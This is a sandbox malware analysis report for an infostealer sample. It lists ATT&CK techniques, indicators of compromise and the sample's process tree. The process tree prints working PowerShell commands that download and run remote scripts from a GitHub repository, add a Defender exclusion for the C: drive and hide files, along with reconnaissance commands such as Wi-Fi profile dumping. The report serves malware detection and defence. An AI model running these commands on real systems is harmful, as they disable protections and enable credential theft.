75ee504ebd01b58f96910432c8e6fe419b65b4a1b06fa58f5eedecfaf6ec956d

Analysis

max time kernel
150s
max time network
154s
platform
windows10-2004_x64
resource
win10v2004-20240802-en
resource tags

arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
submitted
25/08/2024, 04:29

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

2024-08-25_80696c196c80f8fa96b9c16e96118079_poet-rat_snatch.exe
Size

14.0MB
MD5

80696c196c80f8fa96b9c16e96118079
SHA1

8425d9e121cb1ee385dffd8a99cb1b88a12fa5d7
SHA256

75ee504ebd01b58f96910432c8e6fe419b65b4a1b06fa58f5eedecfaf6ec956d
SHA512

9cdc2bdec8acf1f56326dc9d0815ef396ebef261e03c7f1f44b883c2feab1e0fc78619c63ea329f6221761a48b6443ed482466db0eaea4aabadfb49855c9d31d
SSDEEP

196608:d247x52HYfbI5+K/OIss/j9i+zpXts76p/zIf8ryQ5S:dxx5bW+KssLcMXtsezIfxA

Score

9^/10

credential_access discovery evasion execution persistence privilege_escalation ransomware spyware stealer

Malware Config

Signatures

Credentials from Password Stores: Credentials from Web Browsers 1 TTPs
Malicious Access or copy of Web Browser Credential store.
credential_access stealer

Credentials from Web Browsers
T1555.003
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.

Account Manipulation
T1098

Blocklisted process makes network request 2 IoCs

flow	pid	Process
13	1664	powershell.exe
16	4668	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
2396	powershell.exe
4852	PowerShell.exe
1664	powershell.exe
4668	powershell.exe

Modifies Windows Firewall 2 TTPs 1 IoCs

evasion

Windows Service

T1543.003

Disable or Modify System Firewall

T1562.004

pid	Process
1592	netsh.exe

Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs

Web Service

T1102

flow	ioc
13	raw.githubusercontent.com
16	raw.githubusercontent.com
12	raw.githubusercontent.com

Network Service Discovery 1 TTPs 1 IoCs

Attempt to gather information on host's network.

discovery

Network Service Discovery

T1046

pid	Process
4284	ARP.EXE

Sets desktop wallpaper using registry 2 TTPs 1 IoCs

ransomware

Defacement

T1491

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Thunder_Kitty.jpg"	2024-08-25_80696c196c80f8fa96b9c16e96118079_poet-rat_snatch.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217

Event Triggered Execution: Netsh Helper DLL 1 TTPs 9 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe

Permission Groups Discovery: Local Groups 1 TTPs
Attempt to find local system groups and permission settings.
discovery

Local Groups
T1069.001

System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

discovery

Wi-Fi Discovery

T1016.002

pid	Process
3448	netsh.exe
876	netsh.exe

System Network Connections Discovery 1 TTPs 1 IoCs

Attempt to get a listing of network connections.

discovery

System Network Connections Discovery

T1049

pid	Process
2328	NETSTAT.EXE

Gathers network information 2 TTPs 3 IoCs

Uses commandline utility to view network configuration.

System Information Discovery

T1082

Command and Scripting Interpreter

T1059

pid	Process
2912	ipconfig.exe
2328	NETSTAT.EXE
552	ipconfig.exe

Kills process with taskkill 1 IoCs

evasion

pid	Process
3052	taskkill.exe

Modifies Control Panel 2 IoCs

evasion

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000\Control Panel\Desktop\TileWallpaper = "0"	2024-08-25_80696c196c80f8fa96b9c16e96118079_poet-rat_snatch.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000\Control Panel\Desktop\WallpaperStyle = "2"	2024-08-25_80696c196c80f8fa96b9c16e96118079_poet-rat_snatch.exe

Modifies system certificate store 2 TTPs 3 IoCs

evasion spyware trojan

Install Root Certificate

T1553.004

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8	2024-08-25_80696c196c80f8fa96b9c16e96118079_poet-rat_snatch.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e14000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e80f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f631900000001000000100000002fe1f70bb05d7c92335bc5e05b984da620000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827	2024-08-25_80696c196c80f8fa96b9c16e96118079_poet-rat_snatch.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 5c0000000100000004000000001000001900000001000000100000002fe1f70bb05d7c92335bc5e05b984da60f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f63030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e814000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e20000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827	2024-08-25_80696c196c80f8fa96b9c16e96118079_poet-rat_snatch.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses 9 IoCs

pid	Process
1664	powershell.exe
2396	powershell.exe
4852	PowerShell.exe
2396	powershell.exe
4668	powershell.exe
4852	PowerShell.exe
1664	powershell.exe
4668	powershell.exe
4668	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	1664	powershell.exe
Token: SeDebugPrivilege	2396	powershell.exe
Token: SeDebugPrivilege	4852	PowerShell.exe
Token: SeDebugPrivilege	4668	powershell.exe
Token: 33	4940	AUDIODG.EXE
Token: SeIncBasePriorityPrivilege	4940	AUDIODG.EXE
Token: SeDebugPrivilege	3052	taskkill.exe
Token: SeIncreaseQuotaPrivilege	4668	powershell.exe
Token: SeSecurityPrivilege	4668	powershell.exe
Token: SeTakeOwnershipPrivilege	4668	powershell.exe
Token: SeLoadDriverPrivilege	4668	powershell.exe
Token: SeSystemProfilePrivilege	4668	powershell.exe
Token: SeSystemtimePrivilege	4668	powershell.exe
Token: SeProfSingleProcessPrivilege	4668	powershell.exe
Token: SeIncBasePriorityPrivilege	4668	powershell.exe
Token: SeCreatePagefilePrivilege	4668	powershell.exe
Token: SeBackupPrivilege	4668	powershell.exe
Token: SeRestorePrivilege	4668	powershell.exe
Token: SeShutdownPrivilege	4668	powershell.exe
Token: SeDebugPrivilege	4668	powershell.exe
Token: SeSystemEnvironmentPrivilege	4668	powershell.exe
Token: SeRemoteShutdownPrivilege	4668	powershell.exe
Token: SeUndockPrivilege	4668	powershell.exe
Token: SeManageVolumePrivilege	4668	powershell.exe
Token: 33	4668	powershell.exe
Token: 34	4668	powershell.exe
Token: 35	4668	powershell.exe
Token: 36	4668	powershell.exe
Token: SeIncreaseQuotaPrivilege	4668	powershell.exe
Token: SeSecurityPrivilege	4668	powershell.exe
Token: SeTakeOwnershipPrivilege	4668	powershell.exe
Token: SeLoadDriverPrivilege	4668	powershell.exe
Token: SeSystemProfilePrivilege	4668	powershell.exe
Token: SeSystemtimePrivilege	4668	powershell.exe
Token: SeProfSingleProcessPrivilege	4668	powershell.exe
Token: SeIncBasePriorityPrivilege	4668	powershell.exe
Token: SeCreatePagefilePrivilege	4668	powershell.exe
Token: SeBackupPrivilege	4668	powershell.exe
Token: SeRestorePrivilege	4668	powershell.exe
Token: SeShutdownPrivilege	4668	powershell.exe
Token: SeDebugPrivilege	4668	powershell.exe
Token: SeSystemEnvironmentPrivilege	4668	powershell.exe
Token: SeRemoteShutdownPrivilege	4668	powershell.exe
Token: SeUndockPrivilege	4668	powershell.exe
Token: SeManageVolumePrivilege	4668	powershell.exe
Token: 33	4668	powershell.exe
Token: 34	4668	powershell.exe
Token: 35	4668	powershell.exe
Token: 36	4668	powershell.exe
Token: SeIncreaseQuotaPrivilege	4668	powershell.exe
Token: SeSecurityPrivilege	4668	powershell.exe
Token: SeTakeOwnershipPrivilege	4668	powershell.exe
Token: SeLoadDriverPrivilege	4668	powershell.exe
Token: SeSystemProfilePrivilege	4668	powershell.exe
Token: SeSystemtimePrivilege	4668	powershell.exe
Token: SeProfSingleProcessPrivilege	4668	powershell.exe
Token: SeIncBasePriorityPrivilege	4668	powershell.exe
Token: SeCreatePagefilePrivilege	4668	powershell.exe
Token: SeBackupPrivilege	4668	powershell.exe
Token: SeRestorePrivilege	4668	powershell.exe
Token: SeShutdownPrivilege	4668	powershell.exe
Token: SeDebugPrivilege	4668	powershell.exe
Token: SeSystemEnvironmentPrivilege	4668	powershell.exe
Token: SeRemoteShutdownPrivilege	4668	powershell.exe

Suspicious use of WriteProcessMemory 60 IoCs

description	pid	Process	procid_target
PID 2272 wrote to memory of 4668	2272	2024-08-25_80696c196c80f8fa96b9c16e96118079_poet-rat_snatch.exe	85
PID 2272 wrote to memory of 4668	2272	2024-08-25_80696c196c80f8fa96b9c16e96118079_poet-rat_snatch.exe	85
PID 2272 wrote to memory of 1664	2272	2024-08-25_80696c196c80f8fa96b9c16e96118079_poet-rat_snatch.exe	87
PID 2272 wrote to memory of 1664	2272	2024-08-25_80696c196c80f8fa96b9c16e96118079_poet-rat_snatch.exe	87
PID 2272 wrote to memory of 2396	2272	2024-08-25_80696c196c80f8fa96b9c16e96118079_poet-rat_snatch.exe	88
PID 2272 wrote to memory of 2396	2272	2024-08-25_80696c196c80f8fa96b9c16e96118079_poet-rat_snatch.exe	88
PID 2272 wrote to memory of 4292	2272	2024-08-25_80696c196c80f8fa96b9c16e96118079_poet-rat_snatch.exe	89
PID 2272 wrote to memory of 4292	2272	2024-08-25_80696c196c80f8fa96b9c16e96118079_poet-rat_snatch.exe	89
PID 2272 wrote to memory of 4852	2272	2024-08-25_80696c196c80f8fa96b9c16e96118079_poet-rat_snatch.exe	90
PID 2272 wrote to memory of 4852	2272	2024-08-25_80696c196c80f8fa96b9c16e96118079_poet-rat_snatch.exe	90
PID 2272 wrote to memory of 620	2272	2024-08-25_80696c196c80f8fa96b9c16e96118079_poet-rat_snatch.exe	91
PID 2272 wrote to memory of 620	2272	2024-08-25_80696c196c80f8fa96b9c16e96118079_poet-rat_snatch.exe	91
PID 620 wrote to memory of 3624	620	cmd.exe	92
PID 620 wrote to memory of 3624	620	cmd.exe	92
PID 2272 wrote to memory of 2832	2272	2024-08-25_80696c196c80f8fa96b9c16e96118079_poet-rat_snatch.exe	93
PID 2272 wrote to memory of 2832	2272	2024-08-25_80696c196c80f8fa96b9c16e96118079_poet-rat_snatch.exe	93
PID 1664 wrote to memory of 3232	1664	powershell.exe	94
PID 1664 wrote to memory of 3232	1664	powershell.exe	94
PID 4668 wrote to memory of 3916	4668	powershell.exe	95
PID 4668 wrote to memory of 3916	4668	powershell.exe	95
PID 3916 wrote to memory of 1248	3916	csc.exe	96
PID 3916 wrote to memory of 1248	3916	csc.exe	96
PID 3232 wrote to memory of 2600	3232	csc.exe	97
PID 3232 wrote to memory of 2600	3232	csc.exe	97
PID 2272 wrote to memory of 3052	2272	2024-08-25_80696c196c80f8fa96b9c16e96118079_poet-rat_snatch.exe	99
PID 2272 wrote to memory of 3052	2272	2024-08-25_80696c196c80f8fa96b9c16e96118079_poet-rat_snatch.exe	99
PID 4668 wrote to memory of 3448	4668	powershell.exe	102
PID 4668 wrote to memory of 3448	4668	powershell.exe	102
PID 4668 wrote to memory of 2408	4668	powershell.exe	105
PID 4668 wrote to memory of 2408	4668	powershell.exe	105
PID 2408 wrote to memory of 3164	2408	net.exe	106
PID 2408 wrote to memory of 3164	2408	net.exe	106
PID 4668 wrote to memory of 1592	4668	powershell.exe	107
PID 4668 wrote to memory of 1592	4668	powershell.exe	107
PID 4668 wrote to memory of 4788	4668	powershell.exe	108
PID 4668 wrote to memory of 4788	4668	powershell.exe	108
PID 4668 wrote to memory of 1300	4668	powershell.exe	110
PID 4668 wrote to memory of 1300	4668	powershell.exe	110
PID 1300 wrote to memory of 3168	1300	net.exe	111
PID 1300 wrote to memory of 3168	1300	net.exe	111
PID 4668 wrote to memory of 2912	4668	powershell.exe	112
PID 4668 wrote to memory of 2912	4668	powershell.exe	112
PID 4668 wrote to memory of 4016	4668	powershell.exe	113
PID 4668 wrote to memory of 4016	4668	powershell.exe	113
PID 4016 wrote to memory of 4624	4016	net.exe	114
PID 4016 wrote to memory of 4624	4016	net.exe	114
PID 4668 wrote to memory of 4764	4668	powershell.exe	115
PID 4668 wrote to memory of 4764	4668	powershell.exe	115
PID 4668 wrote to memory of 2328	4668	powershell.exe	116
PID 4668 wrote to memory of 2328	4668	powershell.exe	116
PID 4668 wrote to memory of 3732	4668	powershell.exe	119
PID 4668 wrote to memory of 3732	4668	powershell.exe	119
PID 4668 wrote to memory of 552	4668	powershell.exe	120
PID 4668 wrote to memory of 552	4668	powershell.exe	120
PID 4668 wrote to memory of 4780	4668	powershell.exe	121
PID 4668 wrote to memory of 4780	4668	powershell.exe	121
PID 4668 wrote to memory of 4284	4668	powershell.exe	122
PID 4668 wrote to memory of 4284	4668	powershell.exe	122
PID 4668 wrote to memory of 876	4668	powershell.exe	123
PID 4668 wrote to memory of 876	4668	powershell.exe	123

Views/modifies file attributes 1 TTPs 1 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
2832	attrib.exe

C:\Users\Admin\AppData\Local\Temp\2024-08-25_80696c196c80f8fa96b9c16e96118079_poet-rat_snatch.exe
"C:\Users\Admin\AppData\Local\Temp\2024-08-25_80696c196c80f8fa96b9c16e96118079_poet-rat_snatch.exe"
1⤵
- Sets desktop wallpaper using registry
- Modifies Control Panel
- Modifies system certificate store
- Suspicious use of WriteProcessMemory
PID:2272
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -exec bypass -c "(New-Object Net.WebClient).Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;iwr('https://raw.githubusercontent.com/EvilBytecode/ThunderKitty/main/powershellstuff/SysInfo.ps1')|iex"
  2⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:4668
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\r31bxoj5\r31bxoj5.cmdline"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3916
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES80F7.tmp" "c:\Users\Admin\AppData\Local\Temp\r31bxoj5\CSC6D7AEBB112D94328965B38C0F4A2B1B5.TMP"
      4⤵
      PID:1248
- - C:\Windows\system32\netsh.exe
    "C:\Windows\system32\netsh.exe" wlan show profiles
    3⤵
    - Event Triggered Execution: Netsh Helper DLL
    - System Network Configuration Discovery: Wi-Fi Discovery
    PID:3448
- - C:\Windows\system32\net.exe
    "C:\Windows\system32\net.exe" localgroup administrators
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2408
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 localgroup administrators
      4⤵
      PID:3164
- - C:\Windows\system32\netsh.exe
    "C:\Windows\system32\netsh.exe" advfirewall show allprofiles
    3⤵
    - Modifies Windows Firewall
    - Event Triggered Execution: Netsh Helper DLL
    PID:1592
- - C:\Windows\system32\whoami.exe
    "C:\Windows\system32\whoami.exe" /all
    3⤵
    PID:4788
- - C:\Windows\system32\net.exe
    "C:\Windows\system32\net.exe" user
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1300
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 user
      4⤵
      PID:3168
- - C:\Windows\system32\ipconfig.exe
    "C:\Windows\system32\ipconfig.exe" /displaydns
    3⤵
    - Gathers network information
    PID:2912
- - C:\Windows\system32\net.exe
    "C:\Windows\system32\net.exe" localgroup
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4016
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 localgroup
      4⤵
      PID:4624
- - C:\Windows\System32\Wbem\WMIC.exe
    "C:\Windows\System32\Wbem\WMIC.exe" startup get command caption
    3⤵
    PID:4764
- - C:\Windows\system32\NETSTAT.EXE
    "C:\Windows\system32\NETSTAT.EXE" -ano
    3⤵
    - System Network Connections Discovery
    - Gathers network information
    PID:2328
- - C:\Windows\System32\Wbem\WMIC.exe
    "C:\Windows\System32\Wbem\WMIC.exe" /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName,productState,pathToSignedProductExe
    3⤵
    PID:3732
- - C:\Windows\system32\ipconfig.exe
    "C:\Windows\system32\ipconfig.exe" /all
    3⤵
    - Gathers network information
    PID:552
- - C:\Windows\system32\ROUTE.EXE
    "C:\Windows\system32\ROUTE.EXE" print
    3⤵
    PID:4780
- - C:\Windows\system32\ARP.EXE
    "C:\Windows\system32\ARP.EXE" -a
    3⤵
    - Network Service Discovery
    PID:4284
- - C:\Windows\system32\netsh.exe
    "C:\Windows\system32\netsh.exe" wlan show profile
    3⤵
    - Event Triggered Execution: Netsh Helper DLL
    - System Network Configuration Discovery: Wi-Fi Discovery
    PID:876
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -exec bypass -c "(New-Object Net.WebClient).Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;iwr('https://raw.githubusercontent.com/EvilBytecode/ThunderKitty/main/powershellstuff/defenderstuff.ps1')|iex"
  2⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:1664
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\zirjl2if\zirjl2if.cmdline"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3232
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES80F8.tmp" "c:\Users\Admin\AppData\Local\Temp\zirjl2if\CSCC23C1E549D0B43A18CADEAD0D73629F1.TMP"
      4⤵
      PID:2600
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -C "Add-MpPreference -ExclusionPath 'C:'"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2396
- C:\Windows\system32\cmd.exe
  cmd.exe /c start facebook.com
  2⤵
  PID:4292
- C:\Windows\System32\WindowsPowerShell\v1.0\PowerShell.exe
  PowerShell -Command "(New-Object -ComObject SAPI.SpVoice).Speak(\"hey hey\")"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4852
- C:\Windows\system32\cmd.exe
  cmd /c rundll32.exe user32.dll,SwapMouseButton
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:620
- - C:\Windows\system32\rundll32.exe
    rundll32.exe user32.dll,SwapMouseButton
    3⤵
    PID:3624
- C:\Windows\system32\attrib.exe
  attrib +h +s C:\Users\Admin\Documents\WindowsPowerShell\Microsoft.PowerShell_profile.ps1
  2⤵
  - Views/modifies file attributes
  PID:2832
- C:\Windows\system32\taskkill.exe
  taskkill /F /IM wallpaper32.exe
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:3052

C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x4b0 0x314
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:4940

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Account Manipulation

T1098

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Privilege Escalation

Account Manipulation

T1098

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Impair Defenses

T1562

Disable or Modify System Firewall

T1562.004

Modify Registry

T1112

Subvert Trust Controls

T1553

Install Root Certificate

T1553.004

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Network Service Discovery

T1046

Permission Groups Discovery

T1069

Local Groups

T1069.001

System Information Discovery

T1082

System Network Configuration Discovery

T1016

Wi-Fi Discovery

T1016.002

System Network Connections Discovery

T1049

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

